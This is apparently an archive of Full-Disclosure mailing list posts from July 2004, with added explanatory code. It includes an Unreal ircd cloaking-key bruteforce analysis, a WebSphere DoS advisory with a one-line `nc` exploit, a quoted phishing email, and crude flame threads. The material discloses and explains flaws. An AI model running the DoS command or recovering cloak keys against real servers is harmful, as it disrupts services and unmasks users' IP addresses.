/* Do IPv4 cloaking here */
strlcpy(h1, host, sizeof h1);
i = 0;
for (i = 0, p = strtok(h1, "."); p && (i <= 3); p = strtok(NULL, "."), i++)
{
strncpy(h2[i], p, 4);
}
ircsprintf(h3, "%s.%s", h2[0], h2[1]);
l[0] = ((our_crc32(h3, strlen(h3)) + KEY) ^ KEY2) + KEY3;
ircsprintf(h3, "%s.%s.%s", h2[0], h2[1], h2[2]);
l[1] = ((KEY2 ^ our_crc32(h3, strlen(h3))) + KEY3) ^ KEY;
l[4] = our_crc32(host, strlen(host));
l[2] = ((l[4] + KEY3) ^ KEY) + KEY2;
l[2] &= 0x3FFFFFFF;
l[0] &= 0x7FFFFFFF;
l[1] &= 0xFFFFFFFF;
snprintf(cloaked, sizeof cloaked, "%lX.%lX.%lX.IP", l[2], l[1], l[0]);
free(host);
return cloaked;
====
h2[0], h2[1], h2[2], h2[3] contain the four bytes of the original IP.
l[0], l[1], l[2] contain the hashed IP. Thus:
l[0] = (((crc32("1.2") + key1) ^ key2) + key3) & 0x7FFFFFFF;
l[1] = (((crc32("1.2.3") ^ key2) + key3) ^ key1) & 0xFFFFFFFF;
l[2] = (((crc32("1.2.3.4") + key3) ^ key1) + key2) & 0x3FFFFFFF;
crc32(xxx) and l[x] are known. The three keys are used in such a way
that the n-th bit of any key does not affect bits below n in the hash.
We have successfully written a program that bruteforces one bit at a
time. It takes less than one second to do that on a Pentium 4 1.8GHz.
Doing this on a known IP produces around 2000 possible key
combinations. It is then trivial to test them all in order to find the
working ones.
Solution:
Update to version 3.2.1
Up to date information:
http://www.bandecon.com/?action=advisory&adv=unreal
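The bit-isolation property the advisory relies on, shown as an added example (not the advisory's program and not Unreal's code): a Python port of the quoted cloak.c arithmetic plus a check that key bits at position n and above never reach output bits below n. It assumes our_crc32() is a standard CRC-32 (zlib.crc32), uses constructed DEMO_KEYS, and the HMAC-based keyed_cloak is only a contrast, not the 3.2.1 fix, which the advisory does not describe.

```python
import hashlib
import hmac
import zlib

MASK32 = 0xFFFFFFFF

# Constructed keys standing in for KEY, KEY2, KEY3 from the server config.
DEMO_KEYS = (0x1D3F7A6B, 0x8C0E9F21, 0x5A5A0F0F)


def _crc32(s):
    # our_crc32() is assumed to be a standard CRC-32; the property checked
    # below does not depend on this choice, only on the + / ^ key mixing.
    return zlib.crc32(s.encode("ascii")) & MASK32


def cloak_ipv4(host, key1, key2, key3):
    """(l[0], l[1], l[2]) as the quoted cloak.c fragment computes them, with
    the 32-bit wrap-around of an unsigned long on a 32-bit platform."""
    octets = host.split(".")
    if len(octets) != 4 or any(not o.isdigit() or len(o) > 3 for o in octets):
        raise ValueError("expected a dotted-quad IPv4 host")
    ab, abc = ".".join(octets[:2]), ".".join(octets[:3])
    l0 = ((((_crc32(ab) + key1) & MASK32) ^ key2) + key3) & 0x7FFFFFFF
    l1 = ((((key2 ^ _crc32(abc)) + key3) & MASK32) ^ key1) & MASK32
    l2 = ((((_crc32(host) + key3) & MASK32) ^ key1) + key2) & 0x3FFFFFFF
    return l0, l1, l2


def cloaked_host(host, key1, key2, key3):
    """Same "%lX.%lX.%lX.IP" layout as cloak.c."""
    l0, l1, l2 = cloak_ipv4(host, key1, key2, key3)
    return f"{l2:X}.{l1:X}.{l0:X}.IP"


def keyed_cloak(host, key1, key2, key3):
    """Contrast only: three words cut from an HMAC over the whole host, so a
    key bit is not confined to one output bit position."""
    key = b"".join(k.to_bytes(4, "big") for k in (key1, key2, key3))
    digest = hmac.new(key, host.encode("ascii"), hashlib.sha256).digest()
    w = [int.from_bytes(digest[i:i + 4], "big") for i in (0, 4, 8)]
    return w[0] & 0x7FFFFFFF, w[1], w[2] & 0x3FFFFFFF


def low_bits_isolated(cloak_fn, host, n, keys=DEMO_KEYS):
    """True if flipping key bits at positions >= n (in all keys at once and in
    each key alone) never changes the low n bits of any output word.  For
    cloak_ipv4 this always holds: + only carries upward and ^ is bitwise, so
    the low n bits of the output depend on the low n bits of the keys alone,
    which is what lets the keys be searched one bit at a time."""
    hi = (MASK32 << n) & MASK32          # bit positions n..31
    lo = MASK32 ^ hi                     # bit positions 0..n-1
    base = cloak_fn(host, *keys)
    for which in (None, 0, 1, 2):
        flipped = [k ^ hi if which in (None, i) else k for i, k in enumerate(keys)]
        other = cloak_fn(host, *flipped)
        if any((x & lo) != (y & lo) for x, y in zip(base, other)):
            return False
    return True


if __name__ == "__main__":
    print(cloaked_host("10.20.30.40", *DEMO_KEYS))
    for n in (1, 8, 16, 31):
        print(n, low_bits_isolated(cloak_ipv4, "10.20.30.40", n),
              low_bits_isolated(keyed_cloak, "10.20.30.40", n))
```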
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Georgi Guninski (guninski@guninski.com)
Date: Mon Jul 05 2004 - 08:20:42 CDT
we have discussed this before.
the answer again is:
WE'RE NOT GONNA TAKE IT [1]
--
[1] WE'RE NOT GONNA TAKE IT
Twisted Sister
http://www.elyrics4u.com/w/we_re_not_gonna_take_it_twisted_sister.htm
Your life is trite and jaded
Boring and confiscated
On Fri, Jul 02, 2004 at 02:04:29PM -0700, OIS wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
<sh*t deleted>
Re: [Full-Disclosure] Huge amounts of Citipank phishing spam seen this weekend.
From: Duncan Hill (dhill+fulldisc@cricalix.net)
Date: Mon Jul 05 2004 - 08:38:36 CDT
On Monday 05 July 2004 12:15, Feher Tamas might have typed:
> <b>Dear Citibank Customer</b>,
> <p> We recently noticed one or more attempts to log in to
> your Citibank<br=
> <p><i>The login attempt was made from:<br>
> IP address: 173.97.087.24<br>
> ISP Host: cache-89.proxyserver.cis.com</i></p>
> <p> By now, we used many techniques to verify the accuracy
> whom you are dealing with. The system is called CitiSafe
> and it's<br>
> the most secure Citibank wallet so far.</p>
That's a pretty nice bit of dumb-user engineering. Couple of spelling
mistakes in the actual phishing pages (wget + less = wonderful), but
otherwise quite well crafted. I'd swear I even see a browser URL overlay or
similar to give the impression of a different site to the real one.
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: System Outage (system_outage@yahoo.com)
Date: Mon Jul 05 2004 - 08:46:42 CDT
If it's not about respect then what is it about?
You have no respect for the Gmail Team, that's for sure.
I guess this list isn't about respect...
It's about kiddies posting advisories and exploits for fun and little care for the vendor(s).
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect afterall.
Regards,
Ahmed Motaz
------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
---------------------------------
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Will Image (xillwillx@yahoo.com)
Date: Mon Jul 05 2004 - 09:34:57 CDT
calm down system , you act like he just fucked your
sister in the ass on prom night... the list is for
disclosure and thats what hes doing, making people
aware of a flaw.. who cares if its beta a flaw is a
flaw
--- System Outage <system_outage@yahoo.com> wrote:
> If it's not about respect then what is it about?
>
> You have no respect for the Gmail Team, that's for
> sure.
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits
> for fun and little care for the vendor(s).
>
>
> Cheerio
>
>
> amforward@mailsurf.com wrote:
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the
> Gmail contact link for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago,
> but I have not received any
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared
> gmail a public release,
> |you would have gained more respect in the security
> community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
>
------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
>
> ---------------------------------
> Do you Yahoo!?
> Yahoo! Mail - Helps protect you from nasty viruses.
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Tremaine (tremaine@gmail.com)
Date: Mon Jul 05 2004 - 09:46:16 CDT
It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.
It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.
It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.
If you want partial disclosure, you may need to rethink your
subscription to the list.
--
Tremaine
IT Security Consultant
----- Original Message -----
From: System Outage <system_outage@yahoo.com>
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosure@lists.netsys.com
If it's not about respect then what is it about?
You have no respect for the Gmail Team, that's for sure.
I guess this list isn't about respect...
It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect afterall.
Regards,
Ahmed Motaz
------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Syke (syke@mantissecurity.net)
Date: Mon Jul 05 2004 - 09:20:30 CDT
System Outage wrote:
> If it's not about respect then what is it about?
>
> You have no respect for the Gmail Team, that's for sure.
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits for fun and little
> care for the vendor(s).
>
>
> Cheerio
>
>
> */amforward@mailsurf.com/* wrote:
>
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link
> for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago, but I have not
> received any
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a
> public release,
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
> ------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail
> <http://us.rd.yahoo.com/mail_us/taglines/virus/*http://promotions.yahoo.com/new_mail/static/protection.html>
> - Helps protect you from nasty viruses.
Not everything is about respect. Although if that's your outlook on
life, then I pity you for your ego must be the size of Michigan. After
all, if you didn't have the *full* in full-disclosure, this would be
just an ordinary, boring list.
Re: [Full-Disclosure] Web sites compromised by IIS attack
From: Akos Szalkai (szalkai@2fkft.com)
Date: Mon Jul 05 2004 - 09:43:31 CDT
On Thu, Jul 01, 2004 at 06:09:05AM -0400, Valdis.Kletnieks@vt.edu created magic using only numbers:
> On Wed, 30 Jun 2004 21:08:27 CDT, Paul Schmehl <pauls@utdallas.edu> said:
>
> > I attended a presentation yesterday for a security product in the
> > application firewall field. During the presentation, the CISSP stated that
> > "in every 1000 lines of code there will be 15 errors".
>
> Actually, I suspect most coders are *worse* than that.
You may be right, but your calculations are an order of magnitude off. :)
> Sendmail 8.13.0 weighs in at just about 90K lines of C code for
> the main program. By that metric, there should only have been 135
> bugs in it. In fact, there are 441 occurrences of 'Problem noted by'
> in the release notes.
Maybe you were not really awake yet (look at the Date header!), but if
it's 15 errors/KLOC, then 90K lines of code should have 90*15=1350 bugs,
not 9*15=135.
You made the same mistake with BIND. I do not like those two pieces of
software, but this time you showed that the Sendmail/BIND people are
better than the average programmer.
Akos
--
Akos Szalkai <szalkai@2f.hu>
Principal IT Consultant, CISA
2F 2000 Szamitastechnikai es Szolgaltato Kft.
Tel: (+36-1)-4887700 Fax: (+36-1)-4887709 WWW: http://www.2f.hu/
RE: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Mark Laurence (m.laurence@groveindependentschool.co.uk)
Date: Mon Jul 05 2004 - 09:13:28 CDT
"You have no respect for the Gmail Team, that's for sure."
Why would he? Respect is earned not given for free.
"It's about kiddies posting advisories and exploits for fun and little care
for the vendor(s)."
No, the reason they are generally supposed to be posted AFAIK is so that the
security conscious user is aware and can take steps to prevent them from
being exploited. Granted, reasonable steps should be taken to contact the
vendor; if they don't respond then what can one do?
Thanks
Mark
_____
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of System Outage
Sent: 05 July 2004 14:47
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
If it's not about respect then what is it about?
I guess this list isn't about respect...
It's about kiddies posting advisories and exploits for fun and little care
for the vendor(s).
Cheerio
amforward@mailsurf.com wrote:
System Outage wrote:
|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".
I have already contacted Gmail about 10 days ago, but I have not received
any
replies till this moment.
|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.
I don't think this is about respect afterall.
Regards,
Ahmed Motaz
------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1747 - 32 msgs
philipp.freiberger@brodos.de
Date: Mon Jul 05 2004 - 10:33:05 CDT
and all I can think of for that is Google...
sorry... but as soon as it comes to "colourful" stuff I have no clue any more...
Regards, Philipp
PS: I spent all of Sunday fighting with my X to make it do what it is supposed to do - it makes you feel as if you had never seen Linux before... :)
-------- Original Message --------
Subject: Full-Disclosure digest, Vol 1 #1747 - 32 msgs (05-Jul-2004 16:48)
From: full-disclosure-request@lists.netsys.com
To: philipp.freiberger@brodos.de
> Send Full-Disclosure mailing list submissions to
> full-disclosure@lists.netsys.com
>
> To subscribe or unsubscribe via the World Wide Web, visit
> http://lists.netsys.com/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@lists.netsys.com
>
> You can reach the person managing the list at
> full-disclosure-admin@lists.netsys.com
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Today's Topics:
>
> 1. Re: Public Review of OIS Security Vulnerability
> Reporting and Response Guidelines (dave)
> 2. Re:Bugtraq Security Systems (bitlance winter)
> 3. RE: The "Drew Copley is a prick" Poll update
> [Time to Grow Up] (Mortis)
> 4. Gmail Information Disclosure Vulnerability (amforward@mailsurf.com)
> 5. Re: Public Review of OIS Security Vulnerability Reporting and
> ResponseGuidelines (Fred Mobach)
> 6. [ GLSA 200407-03 ] Apache 2: Remote denial of service attack (Thierry
> Carrez)
> 7. [ GLSA 200407-04 ] Pure-FTPd: Potential DoS when maximum connections
> is reached (Thierry Carrez)
> 8. Re: Web sites compromised by IIS attack (Jason Coombs)
> 9. Re: Gmail Information Disclosure Vulnerability (System Outage)
> 10. Re: Re:Bugtraq Security Systems (System Outage)
> 11. Re:Bugtraq Security Systems (Boggles)
> 12. RE: IE Web Browser: "Sitting Duck" (joe)
> 13. Re: Gmail Information Disclosure Vulnerability (D.J. Capelis)
> 14. RE: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security
> Vulnerability Reporting and Response Guidelines (Steve W. Manzuik)
> 15. Re: Gmail Information Disclosure Vulnerability (amforward@mailsurf.com)
> 16. Re: Gmail Information Disclosure Vulnerability (Rudolf Polzer)
> 17. XSS in 12Planet Chat Server 2.9 (Donato Ferrante)
> 18. Re: HP urges users to erase Netscape to avoid security
> problems (Szilveszter Adam)
> 19. Huge amounts of Citipank phishing spam seen this weekend. (Feher
> Tamas)
> 20. CYBSEC - Security Advisory: Denial of Service in IBM WebSphere
> Edge Server (Leandro Meiners)
> 21. Unreal ircd 3.2 clocking subsystem vulnerability (bartavelle)
> 22. Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!
> PLEASE BE ATTENTIVE !!! (Thomas Binder)
> 23. Re: Public Review of OIS Security Vulnerability Reporting and
> Response Guidelines (Georgi Guninski)
> 24. Re: Huge amounts of Citipank phishing spam seen this weekend. (Duncan
> Hill)
> 25. Re: Gmail Information Disclosure Vulnerability (System Outage)
> 26. RE: Gmail Information Disclosure Vulnerability (Mark Laurence)
>
> --__--__--
>
> Message: 1
> Date: Sun, 04 Jul 2004 13:18:35 -0400
> From: dave <dave@immunitysec.com>
> To: OIS <announcements@oisafety.org>
> CC: bugtraq@securityfocus.com, NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM,
> full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Public Review of OIS Security Vulnerability
> Reporting and Response Guidelines
>
> Nobody trusts the OIS or its motives. I imagine this is similar to the
> feedback you've gotten from everyone else as well, but Immunity has no
> plans to subscribe to your guidelines, and is going to oppose any
> efforts you make to legislate those guidelines as law. In section 1.1
> the draft proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue - the
> purpose of the OIS is to lobby towards a business model for Microsoft
> and the other OIS members that involves the removal of non-compliant
> security researchers.
>
> This call for feedback is a thinly disguised attempt to get public
> legitimacy and allow the OIS to claim it has community backing, which it
> clearly does not.
>
> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independance.
>
> Dave Aitel
> Immunity, Inc.
>
>
>
>
> OIS wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > The Organization for Internet Safety (OIS) extends an invitation to
> > the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> > lists to participate in the ongoing public review of the OIS Security
> > Vulnerability Reporting and Response Guidelines.
> > The OIS reviews the Guidelines annually to ensure that they remain
> > useful and relevant to the security community and, most importantly,
> > to the millions of computer users who are the ultimate beneficiaries
> > of effective computer security practices. Over the past year, OIS
> > has received feedback from many adopters of the Guidelines as well as
> > from several public-private partnerships, and have incorporated much
> > of this feedback into an interim version that is available at
> > http://www.oisafety.org/review/draft-1.5.pdf. We recommend reviewing
> > the interim version, but reviewers are welcome to provide feedback on
> > the original version at http://www.oisafety.org/reference/process.pdf
> > if they would like.
> >
> > For more information on the public review, please visit
> > http://www.oisafety.org/review-1.5.html. The closing date for the
> > review has been extended until 16 July 2004. We look forward to your
> > feedback.
> >
> > Regards,
> >
> > The Organization for Internet Safety
> > www.oisafety.org
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP 8.0.3
> >
> > iQA/AwUBQOWQgbF9hclyvjnOEQIhmACfYlaHX2NnJbHUCaCYfMHO4tkGDh0AoMzz
> > KWNTvxgQVKXiC1OU9CR/rXYF
> > =4mT/
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>
> --__--__--
>
> Message: 2
> From: "bitlance winter" <bitlance_3@hotmail.com>
> To: full-disclosure@lists.netsys.com
> Date: Sun, 04 Jul 2004 17:36:50 +0000
> Subject: [Full-Disclosure] Re:Bugtraq Security Systems
>
> Who are YOU,Bugtraq Security Systems?
> Are YOU foo,bar.foobar?
> ;)
> YOU say LOVE,OK.
>
> [blockquote]
> "With burning brain and heart of hate,
> I sought my wronger, early, late,
> And all the wretched night and day
> My dream and thought was slay, and slay.
> My better self rose uppermost,
> The beast within my bosom lost
> Itself in love; peace from afar
> Shone o'er me radiant like a star.
> I Slew my wronger with a deed,
> A deed of love; I made him bleed
> With kindness, and I filled for years
> His soul with tenderness and tears."
>
> Let those who aim at the right life, who believe that they love Truth,
> cease
> to passionately oppose themselves to others, and let them strive to calmly
> and wisely understand them, and in thus acting toward others they will be
> conquering themselves; and while sympathizing with others, their own souls
> will be fed with the heavenly dews of kindness, and their hearts be
> strengthened and refreshed in the Pleasant Pastures of Peace.
> [/blockquote]
>
> Best Regards.
> --
> bitlance winter.
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from McAfeer
> Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
>
> --__--__--
>
> Message: 3
> Date: Sun, 04 Jul 2004 14:17:07 -0400
> To: full-disclosure@lists.netsys.com
> From: Mortis <m0rtis@adelphia.net>
> Subject: RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update
> [Time to Grow Up]
>
> I told you that would be more fun than fishing with dynamite.
>
> Plenty of fresh worms for a hungry turkey.
>
> Sort your mail box and go to town.
> --
> Libel-libel,
> Dan eel
> http://full-disclosure.50megs.com/
>
>
> --__--__--
>
> Message: 4
> Date: Sun, 4 Jul 2004 19:10:44 +0000
> From: amforward@mailsurf.com
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] Gmail Information Disclosure Vulnerability
>
> This message is in MIME format.
>
> ---MOQ1088968244aa66ff8657f08d3292ceb7b3ae771de7
> Brief
> --------------
> While I was playing with Gmail, I found a bug that may disclose
> information about the users currently attempting to register a new
> Gmail account. This seems to be a vulnerability with low severity (at
> least until now).
>
> CheckAvailability Script
> --------------
> In the registration page, the "Check Availability" button queries a
> certain script, namely /accounts/CheckAvailability. The script takes
> the desired username, and checks if it is available. If it is not
> available, it suggests other usernames by contactenating, for example,
> your last name to it.
>
> The Problem
> --------------
> There seems to be a thread-safety problem with CheckAvailability
> script. When the script is under heavy stress, it may return answers
> to queries that are not yours, revealing others' desired usernames,
> and first and last names.(see attached screen shot)
>
>
> Reproduction
> --------------
> To reproduce it, you should:
>
> AND
> a. Have a valid Gmail invitation
> b. Frequently Invoke CheckAvailability by
> ~ OR
> ~ 1. Creating a tool that automates the script invocation.
> ~ 2. Having the patience and keep clicking the button frequently (this
> works too!).
>
>
> I have not yet carefully studied the script, but I think it might not
> be a problem with this script only, but others as well. Your thoughts
> are appreciated.
>
> Regards,
> Ahmed Motaz
>
>
>
> Gmail service is in Beta. You have no credibility posting this advisory.
> The correct channel to post such "bugs" is the Gmail contact link for
> "bug reports".
>
> If you weren't a script kiddie or scene whore, you would have known to
> hold information until such a time that Gmail became a public service.
>
> Then and only then would anyone take this advisory seriously!
>
> You obviously have no understanding of the "Beta" state of a development.
> The fact that a team of developers are in the state of "Beta" means that
> the developers are fully aware the service may not be entirely secure and
> they wish feedback via Google's own beta "bug report" channels.
>
> All in all, this is a "beta bug report" and nothing else. If you had
> waited until the Gmail dev team declared gmail a public release, you would
> have gained more respect in the security community scene.
>
> Cheerio
>
>
> A name like "Bugtraq Security Systems" sounds like a typical name a script
> kiddie group or scene whore group would use to try and gain an easy name
> within the scene.
>
> They (Bugtraq Security Systems) obviously thought... Hey.. "if we whore
> a high profile name and make our website look professional, people will
> buy it and think we're elite".
>
> Lol, if you had any cred in the security community scene, you just lost
> it by mentioning the key words "Defcon" and "Drew Copley is a prick"
> references.
>
> All you are making yourself out to be is a jealous scene whore who wishes
> they had the 0-day exclusives that Eyee Security obtain and you wish you
> were as good as they are.
>
> You have no right to come on a high profile security mailing list with
> such childish remarks towards a highly respected Security Group as Eyee.
> Go find some "elite" zero day and come back when you manage to gain as
> much respect as Eyee Security has within the security community scene.
>
> Cheerio
>
> The following advisory is also available in pdf for download at
> http://www.cybsec.com/vuln/IBM-WebSphere-Edge-Server-DOS.pdf
>
> CYBSEC S.A.
> www.cybsec.com
>
> Advisory Name: Denial of Service in WebSphere Edge Server.
> Vulnerability Class: Denial of Service
> Release Date: June 2nd 2004
> Affected Applications:
>
> * WebSphere Edge Components Caching Proxy 5.02 using
> JunctionRewrite with UseCookie directive.
>
> Not Affected Applications:
>
> * WebSphere Edge Components Caching Proxy 5.02 NOT using
> JunctionRewrite with UseCookie directive.
> * WebSphere Edge Components Caching Proxy 5.00
>
> Affected Platforms:
>
> * SUSE SLES 8
> * SUSE SLES 8 Service Pack 1
> * SUSE SLES 8 Service Pack 3
> * SUSE SLES 8 Service Pack 3
> * Apparently all platforms running WebSphere Edge Server
>
> Local / Remote: Remote
> Severity: High
> Author: Leandro Meiners.
> Vendor Status:
>
> * Fix included in WebSphere Application Server 5.0.3 (to be
> released)
> * Patch available from IBM for clients with Support Level 2 or 3
>
> Reference to Vulnerability Disclosure Policy:
> http://www.cybsec.com/vulnerability_policy.pdf
>
> Overview:
>
> WebSphere Edge Component Caching Proxy, part of WebSphere Application
> Server, is a reverse proxy designed to reduce bandwidth use and improve a
> Web site's speed and reliability by providing a point-of-presence node
> for one or more back-end content servers. It is built to work with
> content provided by one or more backend WebSphere Application Servers.
>
> Vulnerability Description:
>
> The vulnerability discovered allows a remote attacker to generate a
> denial of service condition against the WebSphere Edge Component Caching
> Proxy.
>
> If the reverse proxy is configured with the JunctionRewrite directive
> being active, a remote attacker can trivially cause a denial of service
> by executing the GET HTTP method without parameters.
>
> Exploit:
>
> $ echo 'GET' | nc <victim_host_ip> <proxy_port>
>
> Solutions:
>
> If JunctionRewrite is unnecessary, disabling it will suffice to prevent
> the Denial of Service. Also if the option UseCookie in the
> JunctionRewrite directive is unnecessary disabling it will suffice to
> prevent the Denial of Service.
>
> Vendor Response:
>
> IBM opened a case regarding the vulnerability and provided a patch
> within 2 weeks of the initial contact.
>
> Contact Information:
>
> For more information regarding the vulnerability feel free to contact
> the author at lmeiners@cybsec.com.
>
> For more information regarding CYBSEC: www.cybsec.com
>
>
> ----------------------------
> Leandro Meiners
> CYBSEC S.A. Security Systems
> E-mail: lmeiners@cybsec.com
> Tel/Fax: [54-11] 4382-1600
> Web: http://www.cybsec.com
>
> If it's not about respect then what is it about?
>
> You have no respect for the Gmail Team, that's for sure.
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits for fun and little
> care for the vendor(s).
>
> Cheerio
>
> amforward@mailsurf.com wrote:
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago, but I have not received
> any replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a public release,
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> "You have no respect for the Gmail Team, that's for sure."
> Why would he? Respect is earned not given for free.
>
> "It's about kiddies posting advisories and exploits for fun and little care
> for the vendor(s)."
> No the reason they are generally supposed to be posted AFAIK is so that the
> security conscious user is aware and can take steps to prevent them from
> being exploited. Granted reasonable steps should be taken to contact the
> vendor, if they don't respond then what can one do?
>
> Thanks
> Mark
>
>
>
> _____
>
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of System Outage
> Sent: 05 July 2004 14:47
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
>
>
> If it's not about respect then what is it about?
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits for fun and little care
> for the vendor(s).
>
> Cheerio
>
>
> amforward@mailsurf.com wrote:
>
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago, but I have not received
> any replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a public release,
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
>
>
>
>
To: full-disclosure-request@lists.netsys.com, full-disclosure@lists.netsys.com
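The CYBSEC advisory quoted in the digest above describes a caching proxy that falls over when the request line is nothing but the bare method (a "GET" with no request-target and no HTTP-version), and the only fixes it offers are disabling JunctionRewrite or UseCookie. The defensive treatment of that input class is a parser that refuses a malformed request line with a 400 before any rewriting or cookie logic can touch it. The following is an added example, not code from the advisory or from IBM's product; the method allowlist, the size limits and the sample request lines are constructed for the illustration.

```python
import re
from typing import NamedTuple, Optional, Tuple

# Added example, not code from the CYBSEC advisory or from IBM's product.
# It shows the defensive handling of the input class the advisory describes:
# a request line that is only the bare method, with no target and no version.


class RequestLine(NamedTuple):
    method: str
    target: str
    major: int
    minor: int


# RFC 7230 shape: method SP request-target SP HTTP-version
_REQUEST_LINE = re.compile(r"([A-Z]{1,20}) (\S{1,8192}) HTTP/(\d)\.(\d)")
# Constructed allowlist; a real proxy would take this from its configuration.
_SUPPORTED_METHODS = frozenset({"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"})


class BadRequest(ValueError):
    """Any request line the parser refuses to hand to later stages."""


def parse_request_line(raw: bytes) -> RequestLine:
    # Only ASCII belongs in a request line; reject rather than decode leniently.
    try:
        line = raw.decode("ascii")
    except UnicodeDecodeError as exc:
        raise BadRequest("non-ASCII byte in request line") from exc
    line = line.rstrip("\r\n")
    if not line.isprintable():
        raise BadRequest("control character in request line")
    m = _REQUEST_LINE.fullmatch(line)
    if m is None:
        # A bare "GET" (the advisory's input) ends here with a 400, not a crash.
        raise BadRequest(f"malformed request line: {line!r}")
    method, target, major, minor = m.groups()
    if method not in _SUPPORTED_METHODS:
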